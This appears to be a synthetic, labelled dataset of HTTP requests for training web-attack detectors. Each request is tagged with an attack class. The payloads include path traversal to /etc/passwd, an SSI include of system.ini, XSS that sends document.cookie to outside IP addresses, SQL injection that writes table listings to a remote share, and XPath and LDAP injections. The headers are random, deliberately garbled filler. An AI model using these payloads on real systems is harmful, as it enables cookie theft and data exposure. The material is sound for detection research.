Accept-Encoding: compress;q=0.7, compress, deflate;q=0.7, deflate
Accept-Language: erwipenG-bxn3r7;q=0.9, dt-ehas2a, weAo-7x;q=0.7, stVs-3og5vhen, 8z8Yws-0eh
Cache-Control: min-fresh=006
Client-ip: 191.52.69.207
Cookie: eerdt4eHrbi=iUGMUEFadD;eehim=k'oiEo:c;it=767803861
Cookie2: $Version="53"
Date: Wed, 03 Feb 10 20:39:59 UTC
ETag: "6Uyl2Y07moKN10dFmON"
Expect: 100-continue
From: etDdz@s1Ttlneied.ch
If-Modified-Since: Wed, 04 Oct 06 22:40:15 UTC
If-Unmodified-Since: Sat, 18 Oct 08 11:49:49 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 13 Aug 09 09:08:32 GMT
Max-Forwards: 0
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: Digest uri=/oyooyi/aelsuo1/iteo/eu7usa/EDiri.cfm
Authorization: Digest opaque="4venij"
Range: -2,-9858,-988607
Referer: /a5ti4ruf/mrt9v/ceeeraio/oiTf1a0.wmn
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/9.3 (Windows; U; Win98 3.7; ci-Gn; rv:2.1.4) Gecko/16331303
UA-CPU: Sparc
UA-Disp: 442,012,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0057x268
Via: 2.8 104.24.217.201
Transfer-Encoding: compress
Upgrade: efau/6.6
Warning: 117 www.dpoc.html "usfeuteterl01" 
X-Forwarded-For: 58.152.231.239
X-Serial-Number: 063116688396663
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42011
Start - Id: 46340
class: PathTransversal
GET /QigRheval_@K6i/isrc/CQs4w@.jpg?StU7Amebad=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html HTTP/1.0
Host: www.1nqnk.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: cp-936;q=0.9, iso-8859-5;q=0.2, koi8-r;q=0.6, euc-cn;q=0.4, koi8;q=0.3
Accept-Encoding: gzip, deflate, deflate
Accept-Language: teRkleni-rhg, n-wac, 9oh-re;q=0.0, hoha-tug3f;q=0.4, soeurl-ngkeota
Cache-Control: max-age=9
Client-ip: 142.8.138.99
Cookie: hbsn=37;tqVrncmmfiaw=a;etcO3kz=537845;6ojOh0=2ela;imgDfromfnXeua=isao
Cookie2: $Version="16"
Date: Thu, 20 Oct 05 02:16:26 GMT
ETag: W/"hkiby8KUNkxiNZXx6T8"
Expect: atpxEqu3
From: 5alenh@genhnf8.org
If-Modified-Since: Sat, 02 Feb 08 01:52:44 CET
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "1B.ht9QPm7xAQS1bDZD"
If-None-Match: *
If-Range: Sun, 16 May 04 02:57:59 CET
Max-Forwards: 3998
MIME-Version: 3.4
Pragma: no-cache
Proxy-Authorization: d5wbMt sAfnisba=droetape
Authorization: Digest opaque="blytWmen"
Range: -282967,968090-1346,1029-352
Referer: http://www.eIft.cz/eahttlch/aewearw/t0banlte/tGr7.html
TE: trailers
Trailer: If-None-Match
User-Agent: Mozilla/2.0 (Machintosh; U; PPC Mac OS X 0.7; wl-sg; rv:9.6.9) Gecko/15897305
UA-CPU: x86
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3713x610
Via: 5.0 www.aj70ien.gif, HTTP/6.8 140.239.252.219, HTTP/5.1 186.107.254.38:997
Transfer-Encoding: dsadwo; sisnkt9e=entd
Upgrade: zetne/3.4, eeirz/9.6, roaisl/4.6, ikirr/2.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 252.174.195.68
X-Serial-Number: 33688817267765601
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46340
Start - Id: 35776
class: XPathInjection
GET /8Af7x/hMmVm3tyg/tBIhda/ngDiEzygZwrif1ss.fCw/sheR/yHor/J8N/uYEIvi-t27/tAryjK5/ii2thRfBkwgj_SSOc/dVX6WuqG7NrAK/rUfO.shtml?h9=lc6W&hetl00aeiee8=79+++++or++++fe%2Fe%2Fewno%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D655%5D+++++or++++7%3D&thEft=22119&nXwulm=dz1tn1o2ru+e&R1ycso1ngtteo=642431&htPeetn=615337&bcebhee=756190 HTTP/1.1
Host: www.srno.uk:871
Connection: keep-alive
Accept: text/xml, text/html;q=0.7, video/*;q=0.9
Accept-Charset: iso-8859-9, iso-8859-5;q=0.0, windows-1250;q=0.2, iso-8859-9;q=0.5, windows-1252;q=0.2
Accept-Encoding: 
Accept-Language: ey-rt;q=0.5, Pahetih-ta
Cache-Control: no-transform
Client-ip: 167.0.12.38
Cookie: ss2=3;dsnitrqtnyrv=gts;2l9aRldnetiguo=dci;teascee=eadRoAraidinput
Cookie2: $Version="11"
Date: Mon, 26 Dec 05 12:45:14 GMT
ETag: W/"jzubY5QOV@qA3b9rK"
Expect: ttoH9Am=sbdt;Ilpzdte=rufew
From: Nginnon@eatp.net
If-Modified-Since: Fri, 03 Feb 06 04:09:46 GMT
If-Unmodified-Since: Sun, 14 Mar 04 09:51:00 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 09 Feb 08 14:52:11 UTC
Max-Forwards: 91
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: Basic Z3Nwcjp5bVNvZWJqQQ==
Authorization: Digest response="C38de08AB78A8Cbe7054fC4BdeEC281C"
Range: -777
Referer: /aaaar/m9ai/scJs/dssrRrte/jt6w.swf
TE: chunked,gzip,trailers
Trailer: If-None-Match
User-Agent: uNzeGMsyPz http://www.gbaa.biz
UA-CPU: x86
UA-Disp: 7633,886,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6100x360
Via: gthae/6.9 www.ht4el1.tiff, 7.1 16.141.132.144
Transfer-Encoding: jnee
Upgrade: homom/1.1, t6u/8.5, 6mrrds/0.2, yassta/4.9
Warning: 192 108.52.172.141:8 "C24i" 
X-Forwarded-For: 142.75.180.148
X-Serial-Number: 040193563593
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35776
Start - Id: 40701
class: SSI
PUT /ftmj/ry38EYewosysvlla.aspx? HTTP/1.1
Content-Length: 20
Content-Language: hFete21
Content-Encoding: identity
Content-Location: http://www.Bsq4Q1A.ch/caIcusc/eearw6c/sciMiee.aspx
Content-MD5: MzFjcGllZ3RPZXVzZG9pZQ==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Fri, 23 Feb 07 22:40:09 UTC
Host: 49.4.21.46
Connection: keep-alive
Accept: audio/x-wav;q=0.5, text/*;q=0.6, text/xml;q=0.9
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: <!--#include  virtual="c:\winnt\system.ini"-->
Cache-Control: only-if-cached
Client-ip: 58.101.176.74
Cookie: Jimg.PVDAjC=4Iyd;Sal4Sei=waiSH6ntjcta1idm;GmgRa2=aelmouopena;josIO=R1eMesk0zki
Date: Fri, 31 Oct 08 15:52:42 GMT
Expect: 100-continue
If-Modified-Since: Sun, 18 Jun 06 12:16:39 UTC
If-Unmodified-Since: Tue, 09 Oct 07 07:01:58 UTC
If-Match: "z_ED_rh0-0siWKuGLZq"
If-None-Match: "WS0Q93758E-_IIa8vJQN"
If-Range: *
Authorization: Basic RWU2eHM6bGJlaG4=
Range: 17274-,282-
Referer: http://www.IprIs.biz/aoeQsm/twenoQc5.css
TE: gzip
Trailer: Upgrade
User-Agent: adxWFvB http://www.acmhat3s.cz
UA-Color: color8
Transfer-Encoding: deflate
----: ------------------

1the1Emlttbm=8501220

End - Id: 40701
Start - Id: 47417
class: XSS
GET /grae43gIpueRzgojizw/y-/EocEve48Nfh/sceo4pihmdrdhE/9sn3uE2n1threE/mAu@0xGVx/eedyQy5Nbj-0HG_FA/njW_ti4b.0w4/PnFyp0/r_j-uHlXhUwthnrgPMW.cgi?uThe=%3Cimg++src++%3D++++%22+deonetlaet+%22onmouseover%3D+%22+++%5Bwindow.open%28%27http%3A%2F%2F210.189.10.218%2Fne.mdb%27%2Bdocument.cookie%29%3B%5D+++%22++++%3E&ni=+%5B&0nyoireisYIea=sau7o&uroegueonqu9gp=seR&jsehetefAs=nw4srrmTshamv&h.du=hPk&ft=v%2Btderr%3A9t&a85wCmhsEm=2r HTTP/1.0
Host: www.ewcjq.it
Connection: t6ut
Accept: text/*;q=0.0, audio/x-wav
Accept-Charset: *;q=0.1
Accept-Encoding: gzip
Accept-Language: 2atii-U;q=0.2, atm8c-pwcaei;q=0.8, lEif-9szh, h-eroies;q=0.2
Cache-Control: only-if-cached
Client-ip: 210.252.219.246
Cookie: Si1sjeogXo7=s|;tenahd9=n0d h7catho<and;rmpoeist3qrir=?erm
Cookie2: $Version="9"
Date: Thu, 19 Jul 07 19:34:58 CET
ETag: W/"QWUjZ4EE_zuMajbKCL"
Expect: bnh5u=ermwt
From: Tfteutit@rtorijsiis.be
If-Modified-Since: Mon, 27 Apr 09 01:49:36 CET
If-Unmodified-Since: Sat, 28 Oct 06 01:11:26 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 571
MIME-Version: 4.6
Pragma: s='ca3'
Proxy-Authorization: nuoe nldti=eta2nt
Authorization: NTLM b25hZG9zZWhkeWhwdHZtcWVsaHQxZTl6TWZubGwzdmllV2F1YmM4dG5pYXZyYWVu
Range: 25658-9605
Referer: /eestc/plletrs.tar.gz
TE: trailers
Trailer: If-Range
User-Agent: tZU81vDv http://www.aihehee.biz
UA-CPU: StrongARM
UA-Disp: 488,2720,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 1670x058
Via: 3.9 www.loig.css
Transfer-Encoding: identity
Upgrade: s8ps/3.5, oy10/6.8
Warning: 029 www.8bsannTr.png "tiuS0ahxectarQgg" "Sat, 24 Jan 04 03:40:28 GMT"
X-Forwarded-For: 14.95.154.93
X-Serial-Number: 42081713059681814203
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47417
Start - Id: 41011
class: SqlInjection
POST /elcEfnneohAi.js? HTTP/1.1
Content-Length: 208
Content-Language: Iat,4snwNep5,n
Content-Encoding: deflate
Content-Location: /ecigten/ocspr/ntvo/1htxeieu/2ott.txt
Content-MD5: bnhwNWJkc2RhRTVBYXRUMg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 03 Jun 07 06:04:35 UTC
Last-Modified: Mon, 31 Jan 05 21:02:05 CET
Host: www.ltiZDtdha.cz
Connection: close
Accept: audio/basic, audio/x-wav
Accept-Charset: *
Accept-Encoding: 
Accept-Language: tb-n4l
Cache-Control: no-transform
Client-ip: 103.167.168.13
Cookie: cl74agnripjeav=85759520;rh=44760;dmSoStOw=g
Cookie2: $Version="131"
Date: Fri, 06 Mar 09 13:30:04 UTC
ETag: "J9oOxUDDW36cel@qM"
Expect: 100-continue
From: eal0aMeE@nr960.com
If-Modified-Since: Sun, 12 Dec 04 09:36:24 UTC
If-Unmodified-Since: Mon, 04 Feb 08 20:19:16 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 12 Jul 06 23:25:34 UTC
Max-Forwards: 7
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: Digest response="Da7EBFf2e6D8F588b475adAdda612ba3"
Authorization: Basic aWV3anc0bjpuaW5u
Referer: http://www.moaotdfo.de/ny1n/teerneh/josaa/kd15Noth.jsp
TE: deflate
Trailer: Expect
User-Agent: ro1ex (nF23S.X)
UA-Pixels: 892x2342
Via: 9.1 204.101.191.39:95704, FTP/4.1 170.126.25.12
Transfer-Encoding: deflate
Upgrade: uw1/6.2, gcsmod/3.8, exeh/4.6
Warning: 164 www.jIwGs.png "tHplR" 
X-Forwarded-For: 134.103.78.204
X-Serial-Number: 0694203566390094
----: --------------------------
~~~~~: ~~~~~~~~~~~~

e9ab8edmbi0ii=8662805&myasimai=acmdmetaD6 neaR|b&zs=';  EXEC  master..sp_makewebtask    "\\43.36.113.61\af\ri.css",  "SELECT *     FROM    INFORMATION_SCHEMA.TABLES"&jOre3bic=778835899

End - Id: 41011
Start - Id: 39066
class: LdapInjection
POST /eVWbtLeZlqNy9LwGj_/z6@RyphHqRel/yoylwDDbRyKOTYS/8a7fE4K/fzI8W4l0if/3Rd/o0cdhBPg/oIy6Da4lph2mSPrD_W1_/i2Ch.bLk/H3documentq-RZvmJsam/oq476@9eDkrb@vdj.php4? HTTP/1.0
Content-Length: 55
Content-Language: lo8eloe,ndggkr,1edom
Content-Encoding: gzip
Content-Location: /eucekcdl.mpeg
Content-MD5: NmRoc2lwaWVyMWFjYW1JdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 02 Jan 05 20:31:17 GMT
Last-Modified: Wed, 25 Nov 09 05:22:21 GMT
Host: www.azek0e4d.de
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: compress
Accept-Language: *
Cache-Control: min-fresh=28
Client-ip: 239.175.77.189
Cookie: isnsrS4hlIt=qoAnuTiseI;sxhthtltlt=6;systemunionzvGqBEI=u_EHoSq;layirns=153)(&(objectClass=MosB)(|(sn=ot7)(cn=ife     J*))
Cookie2: $Version="43"
Date: Sat, 26 Feb 05 02:59:20 GMT
ETag: W/"hqIc9jPpy9M1jb9Fhtd"
Expect: 100-continue
From: ct0nt@neotdaE7.cz
If-Modified-Since: Fri, 26 May 06 03:35:28 CET
If-Unmodified-Since: Tue, 26 Jul 05 22:04:41 GMT
If-Match: *
If-None-Match: "k1AA7HE74DtYYoHbey"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="bc4244b1f0ed32c2C5fBb2dF8b3fa903"
Authorization: NTLM NmRtRU5ybzBhbWpicmdOcGE1YWNhdG9zYnFzdWVlMHlScGhyZW5y
Range: 42453-074211
Referer: http://www.faods.be/lrirvIje/ykomh/taerrm.gif
TE: chunked,trailers
Trailer: User-Agent
User-Agent: bz.J_@wt http://www.c3tcmT55.biz
UA-CPU: MIPS
UA-OS: Win98
UA-Color: color32
UA-Pixels: 0434x6105
Via: 0.7 www.oohr99.jpg, 0.1 239.57.184.170, 0.5 61.129.191.6:094
Transfer-Encoding: identity
Upgrade: oe8sa5/3.6, asot/7.7, vIoul/0.4, Oitiff/6.5
Warning: 543 www.edobgt0.js "lcowdr5ilNc" "Thu, 29 Dec 05 20:06:59 GMT"
X-Serial-Number: 53018392304378
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hieaaerh0tge=1aolsea&gbppele=lnpeomdllftrss6&TRKfE=7149

End - Id: 39066
Start - Id: 45208
class: PathTransversal
GET ////? HTTP/1.1
Host: 106.55.74.172
Connection: saisPUg
Accept: application/*;q=0.7, application/*, image/png
Accept-Charset: *;q=0.9
Accept-Encoding: gzip, compress;q=0.7
Accept-Language: on-lecso1;q=0.2, seStZco-pnle
Cache-Control: max-age=824
Client-ip: 125.250.245.160
Cookie: A@fA=gy;bb1=]nbte(2/objectT=e:thh
Cookie2: $Version="5"
Date: Sat, 28 May 05 21:54:18 CET
ETag: W/"Xmo5m4bH7_.musI"
Expect: oq0ewer7
From: nhste@jp1ihu.be
If-Modified-Since: Mon, 07 Aug 06 06:36:56 UTC
If-Unmodified-Since: Fri, 15 Aug 08 13:27:35 CET
If-Match: *
If-None-Match: "ql1LzEgDmoYabfZ.U"
If-Range: Fri, 07 Sep 07 22:02:20 CET
Max-Forwards: 28
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: uvaesU naapebE=ehpe
Authorization: NTLM dG56RWllc2hvczZub05hbzhhaXNwcjd0YWV5bmk3b2xy
Range: 706278-,584316-,-67
Referer: http://noltp.net/tawy/feskahbd/ibwu.zip
TE: trailers,chunked;q=0.8
Trailer: User-Agent
User-Agent: Mozilla/7.8 (X11; U; Linux i386 5.6; a1-oe; rv:3.6.3) Gecko/42862184
UA-CPU: Sparc
UA-Disp: 675,5988,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0142x8254
Via: FTP/1.0 www.nesDsdad.js:89, FTP/4.6 36.194.95.194, 4.1 134.5.100.143
Transfer-Encoding: deflate
Upgrade: botOA/6.4, hiei4a/3.6, u8Qat/8.0
Warning: 342 www.bgya.css "oc3o7d" 
X-Forwarded-For: 157.255.96.148
X-Serial-Number: 706890452941318
----: -------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45208
Start - Id: 37783
class: LdapInjection
GET /i5soo4eebzifrhiee9/No/tsN.jBKobuEoP-Ph7aH/GRformoptVRiOwindow.openp/znIts6waeoddtDrne/h71/hVHhhPRY/2sfeo3rnxllPdceTbl.gif?unnimecitfbmtut=i1o0hA&tcdntfhifroOeh3=hdan&Iotuooedtvie8fe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.0
Host: www.nnnSea2A.de
Connection: keep-alive
Accept: image/gif, image/gif, video/quicktime
Accept-Charset: euc-jp;q=0.8, iso-8859-2, koi8;q=0.2, iso-10646-ucs-2;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: no-transform
Client-ip: 194.12.134.57
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="8"
Date: Thu, 02 Aug 07 09:43:40 CET
ETag: "mDAYOsL4em92yPEE154f"
Expect: wdlwmtn=rmtd;isou5=aemieea
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Tue, 30 Sep 08 06:09:32 CET
If-Match: "OfvDuR9paX9RqvEV7"
If-None-Match: *
If-Range: "wuvfO.hD2i8yboWEKoWK"
Max-Forwards: 3152
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: RanlI8 hfn2me8l=cnlo
Authorization: ruOs2 s7fosnh=weuj
Range: 942-,92-,07-63
Referer: http://www.A4sa.it/vlsf/onlgcrh4/issh/cefua/tEni.nsf
TE: gzip,trailers
Trailer: Range
User-Agent: Mozilla/2.8 (X11; U; Linux i386 9.4; Wt-3C; rv:6.9.8) Gecko/57504150
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: heeus/3.0 116.213.20.86, 8.6 www.uufesE.html, 0.2 www.oAt6utna.css
Transfer-Encoding: compress
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 736 246.53.33.205 "ozyyvn" "Tue, 19 Feb 08 20:58:35 UTC"
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37783
Start - Id: 38121
class: LdapInjection
GET /2FPyswkxa-KtPuOs0/en/ymwn3tStiusut7etg/sredaedLosRlfm/ient8s4ua1asEdara/Lr-BlGvarZZ/e0-IJFRQWpPob2T/0Tibnum/HdzlBeN.js?3otsltrwminwrvm=%29+%28+++%7C%28l6ebE%3De6Nus*%29&dp=328&seome3vis=682&aejihntsne=asdnn&aza=6779&d9d=6148094&ugrl=l%7Euniontnn0tmp%40eh4&sgetnoreN7oei=Ialogralt&LniUHiz=lsAay6G6tfrom1documentiudp&tkt4ohtey=57&hoyorc=et&tnydor=0955276458 HTTP/1.1
Host: www.7Itll.st
Connection: keep-alive
Accept: application/*, image/gif, image/jpeg
Accept-Charset: x-mac-arabic;q=0.7, x-mac-turkish;q=0.7, euc-tw, koi8-r, x-mac-arabic
Accept-Encoding: *;q=0.7
Accept-Language: ket-Ietmn, wZ-i2Ar;q=0.9
Cache-Control: no-transform
Client-ip: 76.39.81.250
Cookie: tpswnytchwotN=1isdf;3rpeuh5slsht=51608
Cookie2: $Version="4"
Date: Mon, 12 Feb 07 03:00:37 GMT
ETag: "JkoRqWUTwzQqckjWOFJx"
Expect: 100-continue
From: r0roy@hbe7rHPeNd.st
If-Modified-Since: Wed, 09 Sep 09 02:25:42 GMT
If-Unmodified-Since: Sat, 26 Mar 05 05:54:18 UTC
If-Match: *
If-None-Match: *
If-Range: "fbjaM5oNj78dL@FpyRU"
Max-Forwards: 2
MIME-Version: 2.1
Pragma: lhele=norWs
Proxy-Authorization: ttA2f lstyphu=yxiY
Authorization: mtik vc3Eion=aDdae
Range: 17768-5
Referer: /eisMe/tb9uge7e.jpg
TE: chunked,chunked;q=0.8,trailers
Trailer: Trailer
User-Agent: hsatieees (t4JhDMebPR; r1fXPO0N; oktk3Y)
UA-CPU: 68000
UA-Disp: 072,9161,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 3700x2595
Via: 2.6 14.227.29.154, HTTP/8.3 www.rewgqoot.js:117, 8.8 www.sseue.png
Transfer-Encoding: gzip
Upgrade: gsce/8.8, osc/5.9, loe/5.9, ect/1.6, 1xRehs/4.9
Warning: 587 179.247.41.91:5 "gatfalPphg" "Thu, 07 Apr 05 01:06:21 UTC"
X-Forwarded-For: 106.193.146.221
X-Serial-Number: 7877748356062880
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38121
Start - Id: 48693
class: XPathInjection
PUT /db4t/yZtH2CB@J/CWAG7ZESR/7inontfw/eeeokohu8une/lP/asy/5drocozyisskedare2/AejdaVhpenstots/awhoDagr7Heatno/ihcod9etgasu3r/oai.jsp? HTTP/1.1
Content-Length: 473
Content-Language: mohvseoo
Content-Encoding: deflate
Content-Location: http://www.lCo0nrbn.uk/gfmy/frtcs.mdb
Content-MD5: b08zbzhCbm5hRGdyTWhubg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 29 Mar 10 10:09:36 CET
Last-Modified: Fri, 25 Jan 08 07:19:59 CET
Host: www.8tyoiype.be
Connection: iiaryui
Accept: */*;q=0.9
Accept-Charset: iso-8859-2, cp-932;q=0.7
Accept-Encoding: *;q=0.9
Accept-Language: s-E2eeea
Cache-Control: no-transform
Client-ip: 53.40.104.156
Cookie: ekciECSecopyDY=14955;srUleodueoo=55;tpSeenetcliG=ps';airaaocitpWtwn=twnse4;ntatGv=eWOcJ;JdivXVuRA=92921
Cookie2: $Version="590"
Date: Mon, 02 Jan 06 06:53:29 UTC
ETag: "iRPx-vhsrn5IOB4F@6ra"
Expect: 100-continue
From: i1istd@23tm.net
If-Modified-Since: Thu, 11 Mar 10 05:01:09 GMT
If-Unmodified-Since: Fri, 05 Mar 04 07:19:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 799
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Basic bXNlczlyaDpudHNo
Authorization: Basic SXR2dTp1bkljZGE=
Range: 569156-2482
Referer: http://Tkhhat.fr/oi5pee/uinlgsqi/Neheta.css
TE: gzip,trailers,trailers
Trailer: Accept
User-Agent: sefss42Dtne
UA-Disp: 5095,3013,8
UA-Color: color16
UA-Pixels: 640x9904
Via: 5.2 96.130.108.219, 4.0 230.93.196.168:3142, fT9/2.1 www.tuyssr.htm
Transfer-Encoding: gzip
Upgrade: 4mtfwe/7.8, Nuhsbd/2.0, ozoe1/6.1, oePeo/8.5, ats/0.5
Warning: 956 www.8Oqk.shtml:3 "dhfeiV6ltr" 
X-Serial-Number: 3185085450816900238
----: ----------------------

Axwhi=ut5eo&sc2MwidojbeE=ga&tBuvhWzag=hrrebetin85i4drhOc&aoleihnuocEsrty=lna~home6ncst ia&qGiwxUgxtermd2=0&yV7GczpI=n)e&tinPeefb=7842377&uqeTdb=unledbztuo&24son5h=alchocs9o1rn4ei$deN&ao5aoioieR=0ewindow.open%dsertih mt9cmdaa&Hsn3uihulorse=tall&ndhad1safSces=Sj/etI/eerc/child::node()[  position()=537]    |  uhne/ar/4i/child::text()[position()=676] or     'ov'=  '&nqaenydTe=16522&tineeeiHiaiizue=rOaUwz3_i7

End - Id: 48693
Start - Id: 46733
class: XSS
GET /mZOAXFLbg1E8IR/vb7/aSietIiXwrt/nBti.oL/Ucrl.js?xAfh=wEsrefesiyaleud0&rgNwls1hhoFhiom=d7zHA&lo@wp=oMJVUFL&Ooireu=dEi83LAQlP&u7eyeesr1=autoexec+ HTTP/1.0
Host: 57.28.246.164
Connection: close
Accept: */*
Accept-Charset: us-ascii, windows-1250;q=0.7, hz-gb-2312
Accept-Encoding: *
Accept-Language: ntufoeby-wesc, icdsltl-dd;q=0.7
Cache-Control: no-cache
Client-ip: 201.132.62.40
Cookie: ANPKX3Xlm=tfcgae;vNr0dpe37t=2Nd;geeNsicOc=a/sO link;exldOleg=<div  style   = "    width: expression([window.open('http://226.205.14.230/is.jsp'+document.cookie);]);    " >;myoR6e2wpdi=aas;6passwdbPB0aO_0j5==epositionE1
Cookie2: $Version="8"
Date: Sun, 06 Aug 06 17:21:28 GMT
ETag: W/"6iD2Nmxi5v5ABb1tw"
Expect: 100-continue
From: Ertclen@yaez.com
If-Modified-Since: Tue, 09 Jun 09 06:37:22 GMT
If-Unmodified-Since: Wed, 26 Aug 09 23:36:31 UTC
If-Match: *
If-None-Match: "Opry@I7.-3UISGO3vYox"
If-Range: *
Max-Forwards: 9155
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: dNtwcd 6dptZm=tetko
Authorization: ojp6r uswliesi=uezLxoo
Range: 112-7,674-5
Referer: http://fAgoac.cz/IbudU.css
TE: chunked,trailers
Trailer: If-Match
User-Agent: 63ABZhFe http://www.9ckif.de
UA-CPU: StrongARM
UA-OS: Win98
UA-Color: color32
UA-Pixels: 318x240
Via: 7.6 www.xrQyh1t.htm, FTP/6.3 201.120.87.115, 6.1 www.rT2tn.jpeg
Transfer-Encoding: compress
Upgrade: iMc/5.2, eehrbu/8.7, eliete/0.1
Warning: 010 www.a8sa.htm "nmhkcmhseac2rng" "Wed, 04 Jun 08 06:13:20 UTC"
X-Serial-Number: 293931197401381
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46733
Start - Id: 47764
class: XSS
GET /rGEopay6xuhaleeNEc/yjDa-uTSV-Ukg/e4en3Ac/obssotttddtdwtieabn8/Thte/lrwnDAtlhoreis2dl6el/eett5aeaetahnl0t0rhx.gif?M2z-=%3Clink++rel%3D+++%22++stylesheet++%22+href+++%3D++++%22+++++javascript%3A++%5Balert+++%28%27NuLfnhde%27%29%3B%5D%22+%3E HTTP/1.1
Host: 65.202.50.102:34120
Connection: close
Accept: */*;q=0.6
Accept-Charset: big5, windows-1252;q=0.7, big5, x-mac-arabic;q=0.8
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.5
Cache-Control: only-if-cached
Client-ip: 226.81.74.174
Cookie: fitytSArve=tgiaat;nwaPianh=o;ntuoEbt=ruUrsu62sboteK;9Sh0J.copyxy=89091;t5CarrFah=tgo
Cookie2: $Version="8"
Date: Sat, 25 Feb 06 17:20:16 UTC
ETag: "V0Vh57R1gKYyWC."
Expect: 100-continue
From: ychumrg@eeAsehi.cz
If-Modified-Since: Mon, 17 Nov 08 16:47:17 UTC
If-Unmodified-Since: Thu, 03 Mar 05 17:48:33 CET
If-Match: "k2AQpJ1pSje.7n@z"
If-None-Match: "kIz2@hTX9ylOAAlAgqS"
If-Range: *
Max-Forwards: 98
MIME-Version: 4.4
Pragma: no-cache
Proxy-Authorization: Basic aHZpbmVkaTpodGFzbw==
Authorization: Basic b255ZnIxbDpuNWVvbg==
Range: 0-6,74113-
Referer: /wyIo.cfm
TE: trailers,trailers,trailers
Trailer: Date
User-Agent: bq5Oia
UA-CPU: 68000
UA-Disp: 1153,3781,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2539x540
Via: 5.0 164.75.247.181
Transfer-Encoding: gzip
Upgrade: napl/9.6, u8eeko/2.8, unr/6.5, Cfe7/9.8
Warning: 123 216.249.112.222 "zvuintlrwsyt" 
X-Forwarded-For: 208.82.57.120
X-Serial-Number: 47690533150312984482
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47764
Start - Id: 49402
class: XPathInjection
GET /aloo/iehrhed4/eWUUY5G/jF68vQBtfh/asoino33eng1hsa4Md9/raesosra/ne6afoden/Y8T5k_3HMJ7cuY/NaBNPJk/ehw5O1.tiff?durhhebsaool=Ocexecias&yyr=3taNt5%27+++or+++++%28i+++++%3C+++count%28cmoe%2Fchild%3A%3Atext%28%29%29+and++j++%3C++count%28nslsid%2Fchild%3A%3Acomment%28%29%29+and+++++k+++++%3C+++++count%28aaj%2Fchild%3A%3A*%29++%29+++++or+%270eePlsct%27+++%3D%27++++HtTnrY%27+or&Hnmo=ri%7Ejr+hnpA HTTP/1.0
Host: 97.171.208.33:80
Connection: close
Accept: audio/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 81.222.19.244
Cookie: 8d1oil5=tsop1cry1y;aa5oeN8=367716408;ouodRdadnt=778;Ys8qiydNe=8t a2rinor4replace;Es@XNgTrsrnf=55
Cookie2: $Version="461"
